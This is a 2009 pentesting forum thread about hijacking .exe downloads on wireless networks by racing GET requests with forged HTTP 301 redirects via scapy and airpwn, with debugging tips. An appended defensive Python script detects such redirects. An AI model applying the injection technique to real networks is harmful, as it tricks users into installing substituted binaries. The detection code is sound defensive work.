Remote Exploit Forums (Specialist Topics: Pentesting)

Thread: replacing .exe on a broadcast network

#1, 06-30-2009, 09:49 PM
Member (Join Date: May 2008, Posts: 35)

Does anyone have any knowledge regarding replacing .exe file requests on a broadcast network by exploiting a race condition? From what I understand at the moment, one can sniff network traffic and, on finding "content-type:application" in a request, respond to it with one's own binary file. I think this would be even cooler than using ettercap filters and injecting code on the fly into an HTML page.

If this is possible, it can also lead to a whole new kind of injection attack in 802.11 networks, where an attacker can send data to the victim without even being associated to the AP.
#2, 07-01-2009, 05:27 AM
Junior Member (Join Date: Aug 2008, Posts: 5)

I believe this is called header injection.


h**p://rturf.net/documentum/?View=entry&EntryID=272

Another

h**p://i8jesus.com/?p=18

Last edited by Mithrilhall; 07-01-2009 at 06:28 AM. Reason: Added additional link.
#3, 07-01-2009, 09:22 PM
Member (Join Date: May 2008, Posts: 35)

Thanks a lot. It looks like an HTTP 301 response is the best thing to do; I have even seen an ettercap filter doing the same. I will try to implement this using scapy on a wifi network. Now I must sit down and start reading up on TCP to understand how the sequence and ack numbers work and how the checksum is calculated...

There is another way of accomplishing this: we can write a customised TCP stack which should race and respond to the GET request, but the problem is that this might become too complicated, since I am trying to do it using packet injection on an 802.11 network without being associated to the AP, and I don't know how to handle and send executable files in packets. Although I would like to learn about it, anybody who could shed some light on this topic or point me to some interesting article would be great. Any suggestions or alternative ways of doing this will also be greatly appreciated.
#4, 07-02-2009, 07:29 AM
wyze, Jenkem Addict (Join Date: Jul 2007, Location: chmod 400, Posts: 1,591)

Quote (originally posted by Cryptid):
There is another way of accomplishing this: we can write a customised TCP stack which should race and respond to the GET request, but the problem is that this might become too complicated, since I am trying to do it using packet injection on an 802.11 network without being associated to the AP, and I don't know how to handle and send executable files in packets. Although I would like to learn about it, anybody who could shed some light on this topic or point me to some interesting article would be great. Any suggestions or alternative ways of doing this will also be greatly appreciated.
Wifitap, which uses scapy, might have some keys to the puzzle.
#5, 07-03-2009, 09:02 PM
Member (Join Date: May 2008, Posts: 35)

Alright, I have achieved some progress but I'm stuck again.

When a GET request is being made, say
Code:
    GET /~sgtatham/putty/latest/x86/putty.exe HTTP/1.1
    Host: the.earth.li
I am replying with a 301 response as such:

Code:
    HTTP/1.1 301 Moved Permanently
    Location: http://spool.metasploit.com/releases/framework-3.2.exe
but the result is turning out to be a request made to

Code:
    /releases/framework-3.2.exerth.li/~sgtatham/putty/latest/x86/putty.exe
Can anyone point out to me what I am doing wrong?
#6, 07-03-2009, 10:17 PM
wyze, Jenkem Addict (Join Date: Jul 2007, Location: chmod 400, Posts: 1,591)

What tool are you using to do this?

One thing Mister_X kindly shed some light on was that airpwn _should_ actually be able to do this out of the box. Unfortunately, I've never got airpwn to work right with mac80211 (even though it's "supported"). I'll try a test with my rt73 card soon and see if it will work in this scenario.
#7, 07-04-2009, 05:18 PM
Member (Join Date: May 2008, Posts: 35)

The problem was that the 301 response had to end with a \r\n, which was missing; that is why the problem occurred. Now it's working, but there is another problem: the race condition is effectively being exploited only the first time, since generating the first response is inducing some amount of latency in the program. All the other GET requests are being retrieved from a buffer and have already been serviced by the authentic source, so no race condition exists any more because the program becomes slow and loses the race... Any help with the program will be greatly appreciated.

At the moment the only solution I can think of is to somehow flush the buffer and start the sniffer again... or somehow get the sniffer to stop sniffing while the program is injecting the packet.

By the way, I am using scapy.

I faced the same problem with airpwn for some time too, but later on figured out that running airodump with "-c" on the same channel as the victim network gets airpwn to correctly inject the data.

Last edited by Cryptid; 07-04-2009 at 05:20 PM. Reason: forgot to add stuff earlier
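A defender-side check for the behaviour this thread describes, added here as an example and not code from any poster. It works on constructed request/response observations (the client addresses and the redirect host are made up) and flags the two things a network monitor would see when a download is raced this way: an .exe request answered by a redirect to a different host than the one it asked for, and a single request that received two different responses.

```python
"""Flag the two on-the-wire symptoms of an injected .exe redirect.

Added defensive example (not code from the thread). Input records are
constructed observations of HTTP requests and the responses that answered
them; client addresses and the off-host redirect target are made up.
"""
from collections import defaultdict
from urllib.parse import urlparse

# (client_ip, acked_seq, request_line, host_header, status_line, location)
# Two records sharing (client_ip, acked_seq) are two answers to one request.
SAMPLE = [
    # ordinary download: one request, one response
    ("10.0.0.5", 1001, "GET /tools/putty.exe HTTP/1.1", "the.earth.li",
     "HTTP/1.1 200 OK", None),
    # a redirect to another host arrives first, the real server answers later
    ("10.0.0.7", 2001, "GET /~sgtatham/putty/latest/x86/putty.exe HTTP/1.1",
     "the.earth.li", "HTTP/1.1 301 Moved Permanently",
     "http://spool.example.com/releases/framework-3.2.exe"),
    ("10.0.0.7", 2001, "GET /~sgtatham/putty/latest/x86/putty.exe HTTP/1.1",
     "the.earth.li", "HTTP/1.1 200 OK", None),
    # same-host redirect of an .exe: a mirror moved a path, not suspicious here
    ("10.0.0.9", 3001, "GET /dl/tool.exe HTTP/1.1", "mirror.example.org",
     "HTTP/1.1 302 Found", "http://mirror.example.org/dl/v2/tool.exe"),
]


def offsite_exe_redirects(records):
    """Return (client, path, location) for .exe requests redirected off-host."""
    hits = []
    for client, _seq, request, host, status, location in records:
        path = request.split()[1]
        code = status.split()[1]
        if not path.lower().endswith(".exe") or code not in ("301", "302", "307"):
            continue
        target = urlparse(location).hostname if location else None
        # Host header may carry a port; compare hostnames only, case-insensitively
        if target and target.lower() != host.split(":")[0].lower():
            hits.append((client, path, location))
    return hits


def racing_responses(records):
    """Return (client, seq) keys that received more than one distinct status."""
    seen = defaultdict(set)
    for client, seq, _request, _host, status, _location in records:
        seen[(client, seq)].add(status)
    return sorted(key for key, statuses in seen.items() if len(statuses) > 1)
```

In live use the records would come from a sniffer on the same segment; the second check is the more robust one, since it fires whether the injected or the genuine answer wins the race.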